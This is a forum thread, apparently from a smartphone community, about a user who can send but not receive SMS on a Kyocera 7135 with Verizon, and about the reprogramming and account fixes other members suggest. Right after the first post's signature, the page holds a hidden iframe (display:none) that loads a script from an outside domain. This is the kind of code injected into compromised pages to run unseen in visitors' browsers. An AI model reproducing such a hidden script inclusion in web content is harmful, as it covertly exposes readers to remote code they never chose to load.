+ Reply to Thread

Setting up Messaging on Verizon 7135

Ok, I am now officially frustrated.

I cannot, for the life of me, get messaging to work.
    I signed up for unlimited messaging at $2.99/month
    with Verizon.

So now, I attempt to send a message to
    phonenumber@vtext.com

Nothing.

Nada.

Zilch.

What am I doing/forgetting to do?

Thanks,

John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Setting up Messaging on Verizon 7135

Did you include your Area Code with the Phone Number?

Originally posted by zucchero

I signed up for unlimited messaging at $2.99/month
    with Verizon.

So now, I attempt to send a message to
    phonenumber@vtext.com

Nothing.

John

Re: Re: Setting up Messaging on Verizon 7135

Originally posted by DMevis
    Did you include your Area Code with the Phone Number?
    Yes, I did include the Area Code.

I was on the phone with 3 different levels of engineers of the "Data Group."

According to him, officially the phone is not release not supported, although I was on the phone with them for almost an hour. Since it is not officially release, he could not open a ticket.

So. my question is, can anybody else send & receive messages? I can send, just not receive.

Please let me know.

--John

I send and receive SMS messages many times each day. And I can vouch for Robert too because he is one of the folks I SMS with. Hmmmmm. Wish I knew how to help you.
    ~'kito
    pdaPhoneHome Moderator

Re: Re: Re: Setting up Messaging on Verizon 7135

Yes, I did include the Area Code.

I was on the phone with 3 different levels of engineers of the "Data Group."

According to him, officially the phone is not release not supported, although I was on the phone with them for almost an hour. Since it is not officially release, he could not open a ticket.

So. my question is, can anybody else send & receive messages? I can send, just not receive.

Please let me know.

--John
    I have offered this to others having issues. If it will help, PM me and I'll give you my mobile number so that VZW can compare settings on the account. If you did Over the Air programing, this is probably a problem in how your account is defined in VZW's network, not with your phone. (although there are certainly settings in the phone that could cause this behaviour.. If VZW is ABSOLUTLY sure they have your account configured correctly, you might want to call Kyo tech support).

Alan

Re: Setting up Messaging on Verizon 7135

John -

I can't recall doing anything special to set up text messages. On my VZW account, I upgraded to the 7135 from the 6035 without a hiccup in January. Have you received SMS messages?

BTW - When I send a text message, I send it to the cell phone recipient's phone number - no vtext.com suffix added. I don't need to know if they are Sprint or VZW. HTH.

Seth

Converged. It didn't even hurt! tuckeyr's Avatar
    When sending to the phone number, do NOT use @vtext.com. OR, send it to the user "alias" WITH @vtext.com. That's what I do and it works perfectly.
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!

Re: Re: Setting up Messaging on Verizon 7135

Originally posted by Sethster
    John -

I can't recall doing anything special to set up text messages. On my VZW account, I upgraded to the 7135 from the 6035 without a hiccup in January. Have you received SMS messages?

BTW - When I send a text message, I send it to the cell phone recipient's phone number - no vtext.com suffix added. I don't need to know if they are Sprint or VZW. HTH.

Seth
    I forgot to mention this.

I can SEND messages, but I cannot RECEIVE them.

I see that others have this working, which tells me that this is a issue for me. It is frustrating, because I cannot use VeriChat, etc. until this issue is resolved.

Is there some phone/pda setting I need to set?

--John

I see that others have this working, which tells me that this is a issue for me. It is frustrating, because I cannot use VeriChat, etc. until this issue is resolved.

Is there some phone/pda setting I need to set?

--John
    There are no typical user accesable settings on the phone. It is either in the programming of the phone, or the programming of the VZW network. Did you phone come pre-programmed, or did you need to dial *228 to have your phone programmed.

If the former, dial *228 and select option 1. If it was already programmed over the air, then the problem is probably in VZW's network. Several posts up from here, I offered to let VZW look at my account and compare it to yours to make sure it is not an account problem. Just PM me and I'll give you my cell number. If VZW is 100% sure that it is not a network settings issue, then you need to call Kyo support. Either VZW misprogrammed the phone, or your phone is broken.

Alan

--John
    Well, its certainly possible (in the bay area) to have VZW disable messaging to prevent ever getting charged for incoming messages. Call VZW customer service and make sure your account has text msging enabled.

-Quick

Ok.. ok.. You did say that 3 levels of data techs looked at it. I suppose its a bit far fetched to think that all 3 of them may have overlooked this... Thats my story and I'm sticking to it!

-Quick

problem solved...

Since zucchero hasn't posted yet, I will. We fixed it today, although I am not 100% sure how. I sent him a direct phone to phone SMS and another one through the vtext.com gateway. i think it was the phone-phone message that shook something lose becuase he got all of his queued messages after that.

Alan

Re: problem solved...

Originally posted by alanb
    Since zucchero hasn't posted yet, I will. We fixed it today, although I am not 100% sure how. I sent him a direct phone to phone SMS and another one through the vtext.com gateway. i think it was the phone-phone message that shook something lose becuase he got all of his queued messages after that.

Alan
    Yes, and I have not a clue what happened. I suspect that maybe Verizon was being something behind the scenes. Allthough they could not open a ticket, the 3rd level engineered was indeed amazed, intrigued, and fascinated at how I could send but not receive.

In any event, Alan is a modern day Moses. He sent a message, and the waters parted, and everything started moving. All 24 queued messages came thru.

Thanks!

John

This reminds me of what occurred with my phone a couple of months ago:
    http://www.smartphonesource.com/vbul...cate#post48654
    After they resolved the problem -- *228 re-program, turn the phone on and off, call any number for 30 seconds, turn phone on and off again -- a flood of pent up messages came through. It was like something was stuck and the above routine jarred it loose.